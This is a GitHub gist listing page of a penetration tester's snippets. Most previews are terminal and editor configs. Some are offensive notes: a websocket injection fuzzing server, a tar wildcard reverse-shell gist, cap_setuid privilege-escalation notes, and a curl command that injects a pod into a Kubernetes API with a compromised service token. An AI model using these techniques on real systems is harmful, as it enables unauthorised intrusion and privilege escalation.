dualfade
/ wss injection testing --
Last active
October 19, 2021 16:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # ws_inj_server.py | |
| # @dualfade | |
| # inspired by -- | |
| # https://bit.ly/3FCA1I4 | |
| """ | |
| Tunnel SocketServer() to websocket() JSON inj-- | |
| sqli / nosqli / fuzz -- |
dualfade
/ gist:f55ff9ac0aa4adfc31c24f952e8b4e42
Created
May 8, 2021 22:45
tar wildcard rev shell --
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [2] % gtfo -b tar | |
| _ _ _ __ | |
| _| || |_ | | / _| | |
| |_ __ _| __ _| |_| |_ ___ | |
| _| || |_ / _` | __| _/ _ \ | |
| |_ __ _| | (_| | |_| || (_) | | |
| |_||_| \__, |\__|_| \___/ | |
| __/ | | |
| |___/ |
dualfade
/ docker ufw --
Last active
November 5, 2021 05:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| BlackArch / ArchLinux Latest -- | |
| Docker UFW issues -- | |
| ## This is not working anymore with docker-compose -- | |
| ## see below -- | |
| docker.json update -- | |
| % cat /etc/docker/daemon.json | |
| { | |
| "iptables": false |
dualfade
/ neovim-init.vim blackarch --
Last active
June 11, 2020 01:55
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # spacevim pissing me off -- | |
| # moving to neovim-init / blackarch -- | |
| # orig -- | |
| # https://github.com/Optixal/neovim-init.vim | |
| # refs -- | |
| # https://github.com/neoclide/coc.nvim | |
| # https://github.com/VundleVim/Vundle.vim | |
| Note: |
dualfade
/ kubernetes pod injection --
Last active
April 26, 2020 05:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Post request to cluster -- | |
| Most articles talked about using "default" as the namespace; | |
| this target needed a very specific namespace to be used because of the token and privileges. | |
| % curl -sk -v -H 'Authorization: Bearer eyJhbHbiOiJSUzI1NiIsImtpZCI6InpR[full_jwt]4bGRe83bt6f_jPs1RXMKt3RnQd5ugveZfw' 'https://poc.somehackeddomain.com:6443/api/v1/namespaces/HACKED_NAMESPACE/pods' -H 'Content-Type: application/json' -d @5h3ll3x.json | |
| yaml pod template -- | |
| Convert to json for proper injection -- | |
| Obviously you have to have enough privileges to use hostPath -- | |
| This particular pen-test aws was breached compromising the kube-system jwt and then the json reverse shell was |
dualfade
/ dot screenrc
Created
April 22, 2020 17:11
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # GNU Screen - main configuration file | |
| # Allow bold colors - necessary for some reason | |
| attrcolor b ".I" | |
| # Tell screen how to set colors. AB = background, AF=foreground | |
| termcapinfo xterm 'Co#256:AB=\E[48;5;%dm:AF=\E[38;5;%dm' | |
| # Enables use of shift-PgUp and shift-PgDn | |
| termcapinfo xterm|xterms|xs|rxvt ti@:te@ |
dualfade
/ termite config --
Created
April 12, 2020 15:27
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ~/.config/termite/config | |
| [options] | |
| allow_bold = true | |
| font = Hack Nerd Font 8 | |
| icon_name = termite | |
| scrollback_lines = 10000 | |
| [colors] | |
| foreground = #c0c5ce |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| file with cap_setuid+ep ?? | |
| user with perms to make it so == root | |
| Just some notes -- | |
| [user@lemur tmp]$ hostname ; id | |
| lemur | |
| uid=1001(user) gid=1001(user) groups=1001(user) | |
| [user@lemur tmp]$ sudo -l | |
| Matching Defaults entries for user on this host: |
dualfade
/ blackarch awesome rofi
Created
March 31, 2020 01:35
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Disable std modkey r -- | |
| enable rofi -- | |
| -- Prompt | |
| -- awful.key({ modkey }, "r", function () mypromptbox[mouse.screen.index]:run() end), | |
| -- Run program (d for dmenu ;) | |
| awful.key({ modkey }, "d", | |
| function() | |
| awful.spawn.with_shell("rofi -matching fuzzy -show combi") |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ~/.config/termite/config | |
| [options] | |
| allow_bold = true | |
| clickable_url = true | |
| font = Hack Nerd Font 8 | |
| geometry = 700x520 | |
| icon_name = terminal | |
| scrollback_lines = 10000 | |
| browser = lynx |